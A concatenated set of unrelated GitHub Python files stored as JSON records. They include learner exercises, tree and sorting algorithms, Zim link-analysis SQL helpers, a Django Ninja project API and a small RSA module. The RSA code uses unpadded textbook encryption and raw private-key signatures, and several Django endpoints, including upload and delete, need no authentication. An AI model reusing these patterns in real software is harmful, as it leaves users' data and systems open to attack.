\"Cash\":\n\t\t\t\tallocation_to_category = r.portfolio_dictionary['cash_amount'] - sc.get_minimum_cash_amount()\n\t\t\t\tif allocation_to_category < 0:\n\t\t\t\t\t# if cash allocation is negative (less cash then reserved amount)\n\t\t\t\t\tallocation_to_category = 0\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tposition = r.positions_dictionary[ticker.name]\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass # ticker not in portfolio; skip\n\t\t\t\telse:\n\t\t\t\t\tallocation_to_category += position[\"total_value\"] / len(ticker.categories)\n\n\t\tactual_allocation_percentage = 100.0 * allocation_to_category / r.portfolio_dictionary['equity']\n\t\tprint(\"{:<30}{:>7}{:>7}{:>7} {}\".format(\n\t\t\tcategory.name,\n\t\t\t\"{:.1f}%\".format(category.allocation_percentage),\n\t\t\t\"{:.1f}%\".format(actual_allocation_percentage),\n\t\t\t\"{:.1f}%\".format(category.allocation_percentage - actual_allocation_percentage),\n\t\t\t\" \".join([t.name for t in stocks_in_category])))\n\tprint()\n\n\t## Print warnings/notifications\n\tuncategorized_tickers = []\n\tfor ticker_name in r.positions_dictionary:\n\t\ttry:\n\t\t\tsc.get_categories_of_stock_ticker(ticker_name)\n\t\texcept stock_categories.TickerNotFoundError:\n\t\t\tuncategorized_tickers.append(ticker_name)\n\tif len(uncategorized_tickers) > 0:\n\t\tprint_section_header(\"Warnings\")\n\t\tlogging.warning(f\"Some tickers are not categorized: {', '.join(uncategorized_tickers)}\")\n\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"g0tmk/robinhood-checker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20554508870","text":"from zim.notebook.index.links import LINK_DIR_FORWARD, LINK_DIR_BACKWARD, LINK_DIR_BOTH\n\ndef _source_target(dir):\n\tassert dir in (LINK_DIR_FORWARD, LINK_DIR_BACKWARD)\n\tif dir == LINK_DIR_FORWARD:\n\t\treturn ('source', 'target')\n\telse:\n\t\treturn ('target', 'source')\n\n\ndef sort_by_number_of_links(notebook, dir):\n\tsource, target = _source_target(dir)\n\treturn notebook.links.db.execute('''\n\t\tSELECT count({target}), pages.name FROM links\n\t\tJOIN pages ON links.{source}=pages.id\n\t\tGROUP BY {source}\n\t\tORDER BY count({target}) DESC\n\t'''.format(source=source, target=target))\n\n\ndef compare_by_links(notebook, dir, page1=None):\n\tsource, target = _source_target(dir)\n\tif page1 is None:\n\t\t# Select all pages that have any links, sorted by number of links\n\t\tfor total, pageid, page1 in notebook.links.db.execute('''\n\t\t\tSELECT count({target}), {source}, pages.name FROM links\n\t\t\tJOIN pages ON links.{source}=pages.id\n\t\t\tGROUP BY {source}\n\t\t\tORDER BY count({target}) DESC\n\t\t'''.format(source=source, target=target)\n\t\t):\n\t\t\tfor match in _compare_by_links(notebook, dir, total, pageid, page1):\n\t\t\t\tyield match\n\telse:\n\t\trow1 = notebook.pages.lookup_by_pagename(page1)\n\t\tpageid = row1.id\n\t\ttotal, = notebook.links.db.execute(\n\t\t\t'SELECT count(*) FROM links WHERE {source}={page1}'.format(source=source, page1=pageid)\n\t\t).fetchone()\n\t\tfor match in _compare_by_links(notebook, dir, total, pageid, page1.name):\n\t\t\tyield match\n\n\ndef _compare_by_links(notebook, dir, total, pageid, page1):\n\t\tsource, target = _source_target(dir)\n\n\t\t# Now find all other pages that have a common link target\n\t\t# and group these by number of occurrences\n\t\tfor match, page2 in notebook.links.db.execute('''\n\t\t\tSELECT count({source}), pages.name FROM (\n\t\t\t\tSELECT source, target FROM links\n\t\t\t\tWHERE {target} IN (\n\t\t\t\t SELECT {target} FROM links WHERE {source} = {page1}\n\t\t\t\t) AND source <> target -- avoid self references\n\t\t\t) JOIN pages ON {source}=pages.id\n\t\t\tGROUP BY {source}\n\t\t\tORDER BY count({source}) DESC\n\t\t'''.format(source=source, target=target, page1=pageid)\n\t\t):\n\t\t\tif page2 != page1:\n\t\t\t\tyield total, match, page1, page2\n\n\ndef find_common_links(notebook, page1, page2, dir):\n\tsource, target = _source_target(dir)\n\trow1 = notebook.pages.lookup_by_pagename(page1)\n\trow2 = notebook.pages.lookup_by_pagename(page2)\n\treturn notebook.links.db.execute('''\n\t\tSELECT DISTINCT pages.name FROM links\n\t\tJOIN pages ON {target}=pages.id\n\t\tWHERE {target} IN (\n\t\t SELECT {target} FROM links WHERE {source} = {page1}\n\t\t) AND {target} IN (\n\t\t\tSELECT {target} FROM links WHERE {source} = {page2}\n\t\t) AND source <> target -- avoid self references\n\t'''.format(source=source, target=target, page1=row1.id, page2=row2.id))\n","repo_name":"jaap-karssenberg/linkanalysis","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"38080646948","text":"# Crie um programa que leia duas notas de um aluno e calcule sua média,\n# mostrando uma mensagen no final, de acordo com a média atingida:\n \n# Média abaixo de 5.0: REPROVADO\n# Média entre 5.0 e 6.9: RECUPERAÇÃO\n# Média 7.0 ou superior: APROVADO\n\nalu1 = float(input(\" digite sua primeira nota: \"))\nalu2 = float(input(\" digite sua segunda nota: \"))\nmedia = (alu1 + alu2 ) / 2\n\nif media <= 5.0:\n print(\" Infelizmente você está REPROVADO!\")\nelif media <= 6.9:\n print(\" Você está de RECUPERAÇÃO!\")\nelse:\n print(\" Parabens você está APROVADO!\")\n \nprint(\" Sua média final é {:.1f}\". format(media))\n \n\n\n","repo_name":"JeanPierre29/Projeto-Python-Guanabara-","sub_path":"Python_Curso_em_Video Mundo_2/Aula12.py/Resposta_exercicio40.aula12.py","file_name":"Resposta_exercicio40.aula12.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3774568629","text":"\"\"\"\nGiven a string str, find length of the longest repeating subseequence such that the two subsequence don’t have same\nstring character at same position, i.e., any i’th character in the two subsequences shouldn’t have the same index in\nthe original string.\n\nInput:\nThe first line of input contains an integer T denoting the number of test cases. Then T test cases follow. The first\nline of each test case contains an integer N denoting the length of string str.\nThe second line of each test case contains the string str consisting only of lower case english alphabets.\nOutput:\nPrint the length of the longest repeating subsequence for each test case in a new line.\n\n\nConstraints:\n1<= T <=100\n1<= N <=1000\n\nExample:\nInput:\n2\n3\nabc\n5\naxxxy\n\nOutput:\n0\n2\n\"\"\"\n\ntCases = int(input())\nfor _ in range(tCases):\n n = int(input())\n s = input()\n dp = [[0 for x in range(n+1)] for y in range(n+1)]\n for i in range(1, n+1):\n for j in range(1, n+1):\n if i != j and s[i-1] == s[j-1]:\n dp[i][j] = 1+dp[i-1][j-1]\n else:\n dp[i][j] = max(dp[i-1][j], dp[i][j-1])\n print(dp[n][n])\n","repo_name":"amit-kr-debug/CP","sub_path":"Geeks for geeks/strings/Longest Repeating Subsequence.py","file_name":"Longest Repeating Subsequence.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"7580063112","text":"\"\"\"\r\n Activity 2: Python Programming - Math Tutor\r\n Submitted by: ADOR, Angelo\r\n HASHIM, Elizabeth Ann\r\n TOLENTINO, Jesse Ann\r\n Year & Section: BSIS-2AB-M\r\n\"\"\"\r\n\r\n#imports the random and os module.\r\nimport random \r\nimport os\r\n\r\n\"\"\"\r\n The code is a calculator that can add, subtract, multiply, and divide two numbers.\r\n \r\n :param x: the first number\r\n :param y: the second number\r\n :return: the result of the operation.\r\n\"\"\"\r\ndef add (x, y):\r\n return x + y\r\n\r\ndef subtract(x, y):\r\n return x - y \r\n\r\ndef multiply(x, y):\r\n return x * y\r\n\r\ndef divide(x, y):\r\n return x / y\r\n\r\nscore = 0\r\n\r\n# Asking the user to input a number between 1 and 4. If the user inputs a number between 1 and 4, it\r\n# will ask the user a question. If the user inputs a number that is not between 1 and 4, it will print\r\n# \"Invalid Input\".\r\nwhile True:\r\n os.system(\"cls\")\r\n print (\"MATH TUTOR\")\r\n print(\"1: Addition\\n2: Subtraction\\n3: Multiplication\\n4: Division\")\r\n choice = input(\"Enter your choice: \")\r\n if choice in ('1', '2', '3', '4'):\r\n if choice == '1':\r\n os.system(\"cls\")\r\n print(\"=== Addition ===\")\r\n # Asking the user how many problems they want to answer.\r\n probNum = int (input(\"\\nHow many problems?: \"))\r\n i = 0\r\n score = 0\r\n while i < probNum:\r\n # Generating random numbers from 0 to 9 and 2 to 10. Then it is adding the two\r\n # numbers.\r\n num1 = float(random.randint(0, 9))\r\n num2 = float(random.randrange(2, 10))\r\n num3 = add(num1, num2)\r\n print(\"\\nWhat is the sum of \" + str(num1) + \" and \" + str(num2))\r\n answer = float(input(\"Enter your answer: \"))\r\n # Checking if the user's answer is correct. If it is correct, it will print \"Correct\"\r\n # and add 1 to the score. If it is wrong, it will print \"Wrong! The correct answer is\"\r\n # and the correct answer.\r\n if num3 == answer:\r\n print(\"Correct\")\r\n score += 1\r\n else:\r\n print(\"Wrong! The correct answer is\", num3)\r\n i += 1\r\n\r\n elif choice == '2':\r\n os.system(\"cls\")\r\n print(\"=== Subtraction ===\")\r\n probNum = int (input(\"How many problems?: \"))\r\n i = 0\r\n while i < probNum:\r\n num1 = float(random.randint(0, 9))\r\n num2 = float(random.randrange(2, 10))\r\n num3 = subtract(num1, num2)\r\n print(\"\\nWhat is the difference of \" + str(num1) + \" and \" + str(num2))\r\n answer = float(input(\"Enter your answer: \"))\r\n if num3 == answer:\r\n print(\"Correct\")\r\n score += 1\r\n else:\r\n print(\"Wrong! The correct answer is\", num3)\r\n i += 1\r\n\r\n elif choice == '3':\r\n os.system(\"cls\")\r\n print(\"=== Multiplication ===\")\r\n probNum = int (input(\"How many problems?: \"))\r\n i = 0\r\n while i < probNum:\r\n num1 = float(random.randint(0, 9))\r\n num2 = float(random.randrange(2, 10))\r\n num3 = multiply(num1, num2)\r\n print(\"\\nWhat is the product of \" + str(num1) + \" and \" + str(num2))\r\n answer = float(input(\"Enter your answer: \"))\r\n if num3 == answer:\r\n print(\"Correct\")\r\n score += 1\r\n else:\r\n print(\"Wrong! The correct answer is\", num3)\r\n i += 1\r\n\r\n elif choice == '4':\r\n os.system(\"cls\")\r\n print(\"=== Division ===\")\r\n probNum = int (input(\"How many problems?: \"))\r\n i = 0\r\n while i < probNum:\r\n num1 = round(float(random.randint(0, 9)),2)\r\n num2 = round(float(random.randrange(2, 10)),2)\r\n num3 = divide(num1, num2)\r\n print(\"\\nWhat is the quotient of \" + str(num1) + \" and \" + str(num2))\r\n answer = float(input(\"Enter your answer: \"))\r\n if num3 == answer:\r\n print(\"Correct\")\r\n score += 1\r\n else:\r\n print(\"Wrong! The correct answer is\", num3)\r\n i += 1\r\n\r\n # Printing the user's score.\r\n print(\"\\nChallenge Done!! Your score is \" + str(score) + \"/\" + str(probNum))\r\n \r\n # Asking the user if they want to try again. If the user inputs \"no\", it will break the loop.\r\n try_again = input(\"\\nWant to try again? (Yes/No):\")\r\n decision = try_again.upper()\r\n if decision == \"NO\":\r\n break\r\nelse:\r\n print(\"Invalid Input\")","repo_name":"jesseanntolentino/Activity","sub_path":"Activity-2-Python-Programming-Math-Tutor.py","file_name":"Activity-2-Python-Programming-Math-Tutor.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71666252587","text":"import hashlib\n\nfrom ninja import Router,File\nfrom django.forms.models import model_to_dict\nfrom backend.common import response,Error\nfrom backend.pagination import CustomPagination\nfrom ninja.pagination import paginate,PageNumberPagination #分页\nfrom typing import List\nfrom projects.api_schema import ProjectIn,ProjectOut\nfrom projects.models import Project\nfrom django.db.models import QuerySet\nfrom django.shortcuts import get_object_or_404\nfrom ninja.files import UploadedFile\nimport os\nfrom backend.settings import IMAGE_DIR\nfrom cases.models import Module, TestCase\nrouter = Router(tags=[\"projects\"])\n\n#创建项目接口\n@router.post(\"/create\",auth=None)\ndef create_project(request,data:ProjectIn):\n name = data.name\n describe = data.describe\n image = data.image\n\n project = Project.objects.filter(name=name)\n if len(project) > 0:\n return response(error=Error.PROJECT_NAME_EXIST)\n if data.image == \"\":\n data.image = \"default_project_image.png\"\n Project.objects.create(**data.dict())\n return response()\n\n#项目列表接口\n@router.get(\"/list\",auth=None,response=List[ProjectOut]) #自定义分页必须加response\n@paginate(CustomPagination)\ndef project_list(request):\n projects = Project.objects.filter(is_delete=False).all()\n return projects\n\n#获取详情接口\n@router.get(\"/{project_id}\",auth=None)\ndef project_detail(request,project_id:int):\n # try:\n # project = Project.objects.get(id=project_id)\n # except project.DoesNotExist:\n # return response(error=Error.PROJECT_NAME_EXIST)\n # else:\n project = get_object_or_404(Project,id=project_id)\n if project.is_delete is True:\n return response(error=Error.PROJECT_IS_DELETE)\n else:\n data = {\n \"id\": project.id,\n \"name\": project.name,\n \"describe\": project.describe,\n \"image\": project.image,\n \"create_time\":project.create_time\n }\n return response(result=data)\n\n#更新项目接口\n@router.put(\"/{project_id}\",auth=None)\ndef project_update(request,project_id:int,data:ProjectIn):\n project = get_object_or_404(Project,id=project_id)\n for atr,value in data.dict().items():\n setattr(project,atr,value)\n project.save()\n '''\n Project.objects.filter(id=project_id).update(image=data.image, name=data.describe,describe=data.describe)\n\n '''\n return response()\n\n#删除项目接口\n@router.delete(\"/{project_id}\",auth=None)\ndef project_delete(request,project_id:int):\n project = get_object_or_404(Project,id=project_id)\n project.is_delete = True\n project.save()\n return response()\n\n#图片上传接口\n\n@router.post(\"/upload/\",auth=None)\ndef upload(request, file: UploadedFile = File(...)):\n # data = file.read()\n # print(file.name)\n # print(file.size)\n file_type = [\"png\", \"jpg\", \"jpeg\", \"txt\"]\n type = file.name.split(\".\")[-1]\n if type not in file_type:\n return response(error=Error.FLIE_TYPE_ERROR)\n else:\n #文件名生成MD5\n file_md5 = hashlib.md5(bytes(file.name,encoding=\"utf-8\")).hexdigest()\n file_name = file_md5+\".\"+type\n # file_dir = os.path.dirname(os.path.abspath(__file__))\n print(\"重命名图片:\",file_name)\n upload_file= os.path.join(IMAGE_DIR,file_name)\n print(upload_file)\n with open(upload_file,\"wb+\") as f:\n for chunk in file.chunks(): #file.chunks()类似与file.read()\n f.write(chunk)\n return response(result={\"name\":file_name})\n\n@router.get(\"/{project_id}/cases\", auth=None)\ndef project_case_list(request, project_id: int):\n \"\"\"\n 通过项目ID 获取用例列表\n auth=None 该接口不需要认证\n \"\"\"\n project = get_object_or_404(Project, id=project_id)\n if project.is_delete is True:\n return response(error=Error.PROJECT_IS_DELETE)\n\n modules = Module.objects.filter(project_id=project.id)\n cases_list = []\n for m in modules:\n cases = TestCase.objects.filter(module_id=m.id)\n for c in cases:\n cases_list.append(model_to_dict(c))\n\n return response(result=cases_list)","repo_name":"PatrickHXH/Test-Development","sub_path":"ClassifiedProject/backend/projects/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1858508437","text":"'''\nChecking word frequency with dictionary\n'''\ndef read_file(filename):\n words =[]\n with open(\"data/\"+filename,'r') as f:\n for line in f:\n for word in line.split():\n words.append(word.strip('\".,?!'))\n return words\n\ndef word_frequencies(words):\n dict = {}\n for i in range(len(words)):\n if words[i] not in dict.keys():\n dict[words[i]] = 1\n else:\n dict[words[i]] += 1\n return dict\n\ndef print_dict(dict):\n for i in dict:\n print(f'Word:{i}, Frequency:{dict[i]}')\n\nwords = read_file(\"long_text.txt\")\nfrequencies = word_frequencies(words)\n\nprint_dict(frequencies)","repo_name":"TazoSepo/Python-Exercises","sub_path":"Basic 2/word_frequency.py","file_name":"word_frequency.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39149346285","text":"\"\"\"Confeccionar un programa con las siguientes funciones:\r\n1)Cargar el nombre de un empleado y su sueldo. Retornar una tupla con dichos valores\r\n2)Una función que reciba como parámetro dos tuplas con los nombres y sueldos de empleados y muestre el nombre del empleado con sueldo mayor.\r\nEn el bloque principal del programa llamar dos veces a la función de carga y seguidamente llamar a la función que muestra el nombre de empleado con sueldo mayor.\"\"\"\r\n\r\ndef CargarEmpleado(num):\r\n print(\"Datos el empleado numero [%s]\" % (num))\r\n nom=input(\"Introducir nombre del empleado: \")\r\n sueldo=0\r\n while sueldo<=100:\r\n sueldo=float(input(\"Introducir salario: \"))\r\n sueldo=round(sueldo, 2)\r\n if sueldo<=100:\r\n print(\"---> El sueldo debe de ser superior a 100.\")\r\n return (nom,sueldo)\r\n\r\ndef MejorPagado(empleado1, empleado2):\r\n print(\"\\nEmpleado con sueldo mayor\")\r\n if empleado1[1]>empleado2[1]:\r\n print(\"Nombre: %s\" % (empleado1[0]))\r\n print(\"Salario: %s\" % (empleado1[1]))\r\n else:\r\n if empleado1[1]= n:\n\t\traise Exception(\"Plain text too long\")\n\treturn int2bytes(quick_power(m, e, n))\n\n\ndef decrypt(ciphertext: bytes, private_key: 'Tuple (d, n)'):\n\td, n = private_key\n\tc = bytes2int(ciphertext)\n\tif c >= n:\n\t\traise Exception(\"Cipher text too long\")\n\treturn int2bytes(quick_power(c, d, n))\n\n\ndef generate_key_pair():\n\t\"\"\"\n\tRandomly generate a RSA key pair\n\tReturns ( public key, private key )\n\t\"\"\"\n\tp = generate_prime(2048)\n\tq = generate_prime(2048)\n\tn = p * q\n\te = 65537 # 65537 is prime.\n\n\tphi = (p - 1) * (q - 1)\n\td = invert(e, phi)\n\treturn (e, n), (d, n)\n\n\ndef get_signature(data_hash: bytes, private_key: 'Tuple (d, n)'):\n\treturn encrypt(data_hash, private_key)\n\n\ndef is_valid_signature(data_hash: bytes, signature, public_key: 'Tuple (e, n)'):\n\tif data_hash == decrypt(signature, public_key):\n\t\treturn True\n\treturn False\n","repo_name":"ChopperCP/MyCryptool","sub_path":"mycryptool/asymmetric/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1652841797","text":"import os\nimport csv\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nMUTED=[\"#4878D0\", \"#EE854A\", \"#6ACC64\", \"#D65F5F\", \"#956CB4\", \"#8C613C\", \"#DC7EC0\", \"#797979\", \"#D5BB67\", \"#82C6E2\"]\nPAL = sns.color_palette(MUTED)\n\nclasses = []\nwith open('data/cookie_table/confusion_matrix.txt', 'r') as infile:\n for i, line in enumerate(infile):\n classes.append([])\n split = line.replace('[', '').replace(']', '').strip().split()\n for item in split:\n classes[i].append(int(item))\n\nsns.set(font_scale=4, style='ticks')\nplt.figure(figsize=(16, 12))\ng = sns.heatmap(classes, cbar=True, cmap='Blues')\nplt.tight_layout()\nsns.despine()\nplt.savefig('data/plots/confusion_matrix.pdf')\n","repo_name":"byron123t/cookie-tables","sub_path":"src/plot_confusion_matrix.py","file_name":"plot_confusion_matrix.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21149041744","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def longestZigZag(self, root: TreeNode) -> int:\n if root is None:\n return 0\n\n self.dp = {}\n self.dfs(root)\n\n result = 0\n for node in self.dp:\n result = max(result, self.dp[node][0], self.dp[node][1])\n\n return result - 1\n\n def dfs(self, node: TreeNode):\n left = 1\n right = 1\n\n if node.left is not None:\n self.dfs(node.left)\n left += self.dp[node.left][1]\n\n if node.right is not None:\n self.dfs(node.right)\n right += self.dp[node.right][0]\n\n self.dp[node] = (left, right)\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1372. Longest ZigZag Path in a Binary Tree/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"35669481586","text":"#tree\r\n\r\nclass Node:\r\n def __init__(self,val):\r\n self.data=val\r\n self.left=None\r\n self.right=None\r\n\r\nclass Tree:\r\n def __init__(self):\r\n self.root =None\r\n \r\n def createTree(self,val):\r\n if self.root is None:\r\n self.root=Node(val)\r\n else:\r\n temp=self.root\r\n print(\"val of temp\",val)\r\n while 1:\r\n if temp.data > val:\r\n if temp.left:\r\n temp=temp.left\r\n else:\r\n temp.left=Node(val)\r\n break\r\n elif temp.data < val:\r\n if temp.right:\r\n temp=temp.right\r\n else:\r\n temp.right = Node(val)\r\n break\r\n else:\r\n pass\r\n def inorderRec(self,temp):\r\n if temp:\r\n self.inorderRec(temp.left)\r\n print(temp.data)\r\n self.inorderRec(temp.right)\r\n \r\n def bfs(self):\r\n tempList=[self.root]\r\n self.root.level=0\r\n tempLevel=self.root.level\r\n bfsList=[]\r\n leftView=[self.root.data]\r\n while tempList:\r\n \r\n temp=tempList.pop(0)\r\n \r\n if temp.level > tempLevel:\r\n tempLevel +=1\r\n bfsList.append(\"\\n\")\r\n leftView.append(temp.data)\r\n \r\n bfsList.append(temp.data)\r\n #print(\" bfsList is : \" ,bfsList)\r\n if temp.left:\r\n temp.left.level = temp.level +1\r\n tempList.append(temp.left)\r\n #print(temp.left.data ,\" inserted \")\r\n \r\n if temp.right:\r\n temp.right.level = temp.level +1\r\n tempList.append(temp.right)\r\n #print(temp.right.data ,\" inserted \")\r\n \r\n print(bfsList)\r\n print(\"leftView \",leftView)\r\n \r\n \r\n \r\n\r\n def rightView(self):\r\n self.root.level=0\r\n tempList=[self.root]\r\n tempLevel=self.root.level\r\n rightViewList=[self.root.data]\r\n \r\n while tempList:\r\n temp =tempList.pop(0)\r\n \r\n if temp.level > tempLevel:\r\n tempLevel +=1\r\n rightViewList.append(temp.data)\r\n\r\n \r\n if temp.right:\r\n temp.right.level =temp.level+1\r\n tempList.append(temp.right)\r\n \r\n if temp.left:\r\n temp.left.level = temp.level+1\r\n tempList.append(temp.left)\r\n \r\n \r\n print(\"rightViewList\",rightViewList) \r\n \r\n def getHeight(self,temp):\r\n if temp:\r\n return 1 + max(self.getHeight(temp.left) ,self.getHeight(temp.right))\r\n else:\r\n return 0\r\n \r\n def getSize(self,temp):\r\n if temp:\r\n return 1+ self.getSize(temp.left) + self.getSize(temp.right)\r\n return 0\r\n \r\n def mirror(self,temp):\r\n if temp:\r\n self.mirror(temp.right)\r\n print(temp.data)\r\n self.mirror(temp.left)\r\n \r\n def maxSumAtWhatLevel(self):\r\n tempList=[self.root]\r\n self.root.level=0\r\n tempLevel=self.root.level\r\n tempMax=0\r\n sumAtLevel=0\r\n maxAtLevel=0\r\n #tempListAtCurrentLevel=[]\r\n while tempList:\r\n temp=tempList.pop(0)\r\n \r\n if temp.level > tempLevel:\r\n if sumAtLevel > tempMax:\r\n tempMax = sumAtLevel\r\n maxAtLevel = tempLevel\r\n tempLevel += 1\r\n sumAtLevel=0\r\n \r\n sumAtLevel += temp.data\r\n \r\n if temp.left:\r\n temp.left.level=temp.level+1\r\n tempList.append(temp.left)\r\n \r\n if temp.right:\r\n temp.right.level=temp.level +1\r\n tempList.append(temp.right)\r\n \r\n print(\"maxAtLevel : \",maxAtLevel, \"Max sum is :\",tempMax )\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\nbst=Tree()\r\nlist1=[5,4,63,7,2,8,1,9,0,-1,91]\r\nfor item in list1:\r\n bst.createTree(item)\r\n \r\nprint(\"inorder tree inorderRec :\") \r\nbst.inorderRec(bst.root) \r\nprint(\"bfs : \")\r\nbst.bfs()\r\n\r\n\r\nprint(\"rightView\")\r\nbst.rightView()\r\n\r\nprint(\"height\")\r\nprint(bst.getHeight(bst.root))\r\nprint(\"Size \")\r\nprint(bst.getSize(bst.root))\r\n\r\nprint(\"miror of inorder\")\r\nbst.mirror(bst.root)\r\n\r\n\r\nbst.maxSumAtWhatLevel()","repo_name":"atulanandnitt/questionsBank","sub_path":"advancedDataStructure/tree/practice_Tree1.py","file_name":"practice_Tree1.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34277393135","text":"# 堆排序\n\n\nclass HeapList(object):\n def __init__(self, _list=None):\n self.l = _list\n\n def swap(self, i, j):\n if i != j:\n self.l[i], self.l[j] = self.l[j], self.l[i]\n\n # 堆调整 s表示需要��整位置的序号, m表示堆的长度\n def heap_adjust(self, s, m):\n lis = self.l\n temp = lis[s]\n while s <= m/2 - 1:\n i = s * 2 + 1\n if i+1 < m:\n if lis[i] < lis[i+1]:\n i += 1\n if temp > lis[i]:\n break\n lis[s] = lis[i]\n s = i\n lis[s] = temp\n\n # 堆排序\n def heap_sort(self):\n length = len(self.l)\n # 循环进行堆调整,直至最后数组变为一个完全二叉堆\n j = int(length/2)-1\n while j >= 0:\n self.heap_adjust(j, length)\n j -= 1\n # 循环将堆顶与数组最后元素交换位置,使堆的长度减一,对堆进行调整\n i = length - 1\n while i >= 0:\n self.swap(0, i)\n self.heap_adjust(0, i)\n i -= 1\n\n def __str__(self):\n return str(self.l)\n\n\nif __name__ == '__main__':\n _list = HeapList([1, 13, 25, 12, 4, 8, 5, 6, 23, 7, 15, 3, 2])\n _list.heap_sort()\n print(_list)\n","repo_name":"namaiwa/sort_demo","sub_path":"heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35518532169","text":"# coding: utf-8\n\nmetadata = dict(\n __name__ = \"about\",\n __version__ = \"5.2\",\n __license__ = \"MIT License\", \n __author__ = u\"Sébastien Boisgérault \",\n __url__ = \"https://github.com/boisgera/about\",\n __summary__ = \"Software Metadata for Humans\",\n __keywords__ = \"Python / 2, Python / 3, OS independent, software development\"\n)\n\nglobals().update(metadata)\n\n__all__ = list(metadata.keys())\n","repo_name":"raihanalam/CompanyWebApp","sub_path":"venv/Lib/site-packages/about/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70278567469","text":"import collections\n\nimport pypath.resources.urls as urls\nimport pypath.share.curl as curl\nimport pypath.utils.taxonomy as taxonomy\n\n\ndef gpcrdb_annotations(organism = 9606):\n \"\"\"\n :param int,str organism:\n Only human and mouse (9606 and 10090) are supported.\n \"\"\"\n \n \n GpcrdbAnnotation = collections.namedtuple(\n 'GpcrdbAnnotation',\n [\n 'gpcr_class',\n 'family',\n 'subfamily',\n ]\n )\n \n organism = taxonomy.ensure_ncbi_tax_id(organism)\n \n if organism not in (9606, 10090):\n \n return {}\n \n i_uniprot = 31 if organism == 10090 else 15\n \n url = urls.urls['gpcrdb']['families']\n \n c = curl.Curl(url, silent = False, large = True)\n \n result = collections.defaultdict(set)\n \n for line in c.result:\n \n if line[0] != ' ':\n \n cls = line.split('|')[0].strip()\n family = None\n subfamily = None\n \n elif line[4] != ' ':\n \n family = line.strip()\n subfamily = None\n \n elif line[8] != ' ':\n \n subfamily = line.strip()\n \n else:\n \n line = line.strip().strip('\"')\n \n if line.startswith('gpcr'):\n \n line = line.split('\",\"')\n uniprot = line[i_uniprot]\n \n if uniprot:\n \n result[uniprot].add(\n GpcrdbAnnotation(\n gpcr_class = cls,\n family = family,\n subfamily = subfamily,\n )\n )\n \n return dict(result)\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/gpcrdb.py","file_name":"gpcrdb.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"6572518328","text":"from sympy import *\nfrom sympy import E, Eq, Function, pde_separate, Derivative as D, Q\nfrom sympy.vector import CoordSys3D,matrix_to_vector,curl,gradient,divergence,Del,Divergence,Gradient, laplacian,Curl\nfrom sympy.physics.vector import ReferenceFrame, Vector, dynamicsymbols\nfrom sympy.physics.quantum import TensorProduct\nfrom sympy.solvers.solveset import linsolve\nimport matplotlib.pyplot as plt\nfrom sympy.parsing.sympy_parser import parse_expr\nfrom sympy.matrices import matrix_multiply_elementwise\nimport numpy as np\nimport mpmath as mp\nimport params\nmp.mp.dps = params.prec\n\nC = CoordSys3D('C')\n\n#######################\n### FUNCTIONS ###\n#######################\ndef factorial(n):\n if n <= 0:\n return 1\n else:\n return n * factorial(n - 1)\n\n# Taylor approximation at x0 of the function 'function'\ndef taylor_series(function, x0, n, x ):\n i = 0\n p = 0\n while i <= n:\n p = p + (function.diff(x, i).xreplace({x: x0}))/(factorial(i))*(x - x0)**i\n i += 1\n return p\n\n# Convert Sympy Matrix to mpmath array\ndef mpmathM(A):\n B = mp.matrix(A.shape[0],A.shape[1])\n for k in range(A.shape[0]):\n for l in range(A.shape[1]):\n B[k,l] = mp.mpc(str(re(A[k,l])),str(im(A[k,l])))\n return(B)\n\n#Find the null space of the mpmath matrix A\ndef null_space(A, rcond=None):\n u, s, vh = mp.svd_c(A)\n\n M, N = u.rows, vh.cols\n if rcond is None:\n rcond = 10**(-(mp.mp.dps)) * max(M, N)\n tol = 